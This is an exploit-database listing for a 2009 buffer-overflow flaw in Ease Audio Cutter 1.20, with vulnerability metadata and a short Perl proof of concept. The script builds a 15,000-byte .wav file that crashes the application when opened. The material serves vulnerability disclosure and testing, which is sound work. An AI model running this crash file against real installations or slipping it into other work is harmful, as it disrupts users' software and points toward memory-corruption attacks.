header-logo
Suggest Exploit
vendor:
Ease Audio Cutter
by:
zAx
7.8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Ease Audio Cutter
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:mp3-cutter:ease_audio_cutter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Ease Audio Cutter 1.20 (.wav file) Local Crash PoC

Ease Audio Cutter 1.20 is vulnerable to a buffer overflow when a specially crafted .wav file is opened. This can be exploited to cause a stack-based buffer overflow via a specially crafted .wav file of 15000 bytes.

Mitigation:

Upgrade to the latest version of Ease Audio Cutter.
Source

Exploit-DB raw data:

#!/usr/bin/perl
###########################################################################
#             Ease Audio Cutter 1.20 (.wav file) Local Crash PoC          #
#                               By : zAx                                  #
###########################################################################
#             Application Homepage : http://mp3-cutter.com                #
#   Application Download : http://mp3-cutter.com/download/audiocutter.exe #
# Description : Click Select file button, select our file and click Play  #
###########################################################################
$crash = "\x42" x 15000;
my $file = "zAx_Crash.wav";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $crash;
close($FILE);
print "Done \n";

# milw0rm.com [2009-09-17]